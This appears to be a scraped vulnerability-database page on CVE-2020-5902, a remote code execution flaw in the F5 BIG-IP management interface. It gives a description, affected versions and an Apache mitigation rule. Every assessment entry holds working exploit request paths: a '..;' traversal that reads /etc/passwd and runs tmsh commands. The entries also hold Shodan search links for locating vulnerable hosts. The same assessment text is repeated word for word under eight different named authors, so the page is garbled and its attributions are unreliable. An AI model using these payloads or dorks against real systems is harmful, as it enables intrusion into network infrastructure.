logo
DATABASE RESOURCES PRICING ABOUT US

CVE-2020-5902 — TMUI RCE vulnerability

Description

In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages. **Recent assessments:** **Mad-robot** at July 05, 2020 1:21pm UTC reported: **CVE-2020-5902** In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages. /tmui/login.jsp/..;/tmui/system/user/authproperties.jsp /tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin' **Patch & Mitigation:-** <LocationMatch ".*\.\.;.*"> Redirect 404 / </LocationMatch> **Versions Effected** * BIG-IP 15.x: 15.1.0/15.0.0 * BIG-IP 14.x: 14.1.0 ~ 14.1.2 * BIG-IP 13.x: 13.1.0 ~ 13.1.3 * BIG-IP 12.x: 12.1.0 ~ 12.1.5 * BIG-IP 11.x: 11.6.1 ~ 11.6.5 **Dorks** <https://beta.shodan.io/search?query=vuln%3Acve-2020-5902> <https://www.shodan.io/search?query=http.favicon.hash%3A-335242539+%223992%22> **kevthehermit** at July 03, 2020 5:30pm UTC reported: **CVE-2020-5902** In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages. /tmui/login.jsp/..;/tmui/system/user/authproperties.jsp /tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin' **Patch & Mitigation:-** <LocationMatch ".*\.\.;.*"> Redirect 404 / </LocationMatch> **Versions Effected** * BIG-IP 15.x: 15.1.0/15.0.0 * BIG-IP 14.x: 14.1.0 ~ 14.1.2 * BIG-IP 13.x: 13.1.0 ~ 13.1.3 * BIG-IP 12.x: 12.1.0 ~ 12.1.5 * BIG-IP 11.x: 11.6.1 ~ 11.6.5 **Dorks** <https://beta.shodan.io/search?query=vuln%3Acve-2020-5902> <https://www.shodan.io/search?query=http.favicon.hash%3A-335242539+%223992%22> **ccondon-r7** at July 04, 2020 10:41pm UTC reported: **CVE-2020-5902** In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages. /tmui/login.jsp/..;/tmui/system/user/authproperties.jsp /tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin' **Patch & Mitigation:-** <LocationMatch ".*\.\.;.*"> Redirect 404 / </LocationMatch> **Versions Effected** * BIG-IP 15.x: 15.1.0/15.0.0 * BIG-IP 14.x: 14.1.0 ~ 14.1.2 * BIG-IP 13.x: 13.1.0 ~ 13.1.3 * BIG-IP 12.x: 12.1.0 ~ 12.1.5 * BIG-IP 11.x: 11.6.1 ~ 11.6.5 **Dorks** <https://beta.shodan.io/search?query=vuln%3Acve-2020-5902> <https://www.shodan.io/search?query=http.favicon.hash%3A-335242539+%223992%22> **busterb** at July 06, 2020 2:29am UTC reported: **CVE-2020-5902** In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages. /tmui/login.jsp/..;/tmui/system/user/authproperties.jsp /tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin' **Patch & Mitigation:-** <LocationMatch ".*\.\.;.*"> Redirect 404 / </LocationMatch> **Versions Effected** * BIG-IP 15.x: 15.1.0/15.0.0 * BIG-IP 14.x: 14.1.0 ~ 14.1.2 * BIG-IP 13.x: 13.1.0 ~ 13.1.3 * BIG-IP 12.x: 12.1.0 ~ 12.1.5 * BIG-IP 11.x: 11.6.1 ~ 11.6.5 **Dorks** <https://beta.shodan.io/search?query=vuln%3Acve-2020-5902> <https://www.shodan.io/search?query=http.favicon.hash%3A-335242539+%223992%22> **0xturazzi** at July 10, 2020 1:59pm UTC reported: **CVE-2020-5902** In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages. /tmui/login.jsp/..;/tmui/system/user/authproperties.jsp /tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin' **Patch & Mitigation:-** <LocationMatch ".*\.\.;.*"> Redirect 404 / </LocationMatch> **Versions Effected** * BIG-IP 15.x: 15.1.0/15.0.0 * BIG-IP 14.x: 14.1.0 ~ 14.1.2 * BIG-IP 13.x: 13.1.0 ~ 13.1.3 * BIG-IP 12.x: 12.1.0 ~ 12.1.5 * BIG-IP 11.x: 11.6.1 ~ 11.6.5 **Dorks** <https://beta.shodan.io/search?query=vuln%3Acve-2020-5902> <https://www.shodan.io/search?query=http.favicon.hash%3A-335242539+%223992%22> **gwillcox-r7** at October 20, 2020 5:49pm UTC reported: **CVE-2020-5902** In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages. /tmui/login.jsp/..;/tmui/system/user/authproperties.jsp /tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin' **Patch & Mitigation:-** <LocationMatch ".*\.\.;.*"> Redirect 404 / </LocationMatch> **Versions Effected** * BIG-IP 15.x: 15.1.0/15.0.0 * BIG-IP 14.x: 14.1.0 ~ 14.1.2 * BIG-IP 13.x: 13.1.0 ~ 13.1.3 * BIG-IP 12.x: 12.1.0 ~ 12.1.5 * BIG-IP 11.x: 11.6.1 ~ 11.6.5 **Dorks** <https://beta.shodan.io/search?query=vuln%3Acve-2020-5902> <https://www.shodan.io/search?query=http.favicon.hash%3A-335242539+%223992%22> **wvu-r7** at September 03, 2020 5:15pm UTC reported: **CVE-2020-5902** In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages. /tmui/login.jsp/..;/tmui/system/user/authproperties.jsp /tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin' **Patch & Mitigation:-** <LocationMatch ".*\.\.;.*"> Redirect 404 / </LocationMatch> **Versions Effected** * BIG-IP 15.x: 15.1.0/15.0.0 * BIG-IP 14.x: 14.1.0 ~ 14.1.2 * BIG-IP 13.x: 13.1.0 ~ 13.1.3 * BIG-IP 12.x: 12.1.0 ~ 12.1.5 * BIG-IP 11.x: 11.6.1 ~ 11.6.5 **Dorks** <https://beta.shodan.io/search?query=vuln%3Acve-2020-5902> <https://www.shodan.io/search?query=http.favicon.hash%3A-335242539+%223992%22> **miteshkwan1** at July 17, 2020 1:32pm UTC reported: **CVE-2020-5902** In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages. /tmui/login.jsp/..;/tmui/system/user/authproperties.jsp /tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin' **Patch & Mitigation:-** <LocationMatch ".*\.\.;.*"> Redirect 404 / </LocationMatch> **Versions Effected** * BIG-IP 15.x: 15.1.0/15.0.0 * BIG-IP 14.x: 14.1.0 ~ 14.1.2 * BIG-IP 13.x: 13.1.0 ~ 13.1.3 * BIG-IP 12.x: 12.1.0 ~ 12.1.5 * BIG-IP 11.x: 11.6.1 ~ 11.6.5 **Dorks** <https://beta.shodan.io/search?query=vuln%3Acve-2020-5902> <https://www.shodan.io/search?query=http.favicon.hash%3A-335242539+%223992%22> Assessed Attacker Value: 5 Assessed Attacker Value: 5Assessed Attacker Value: 5


Related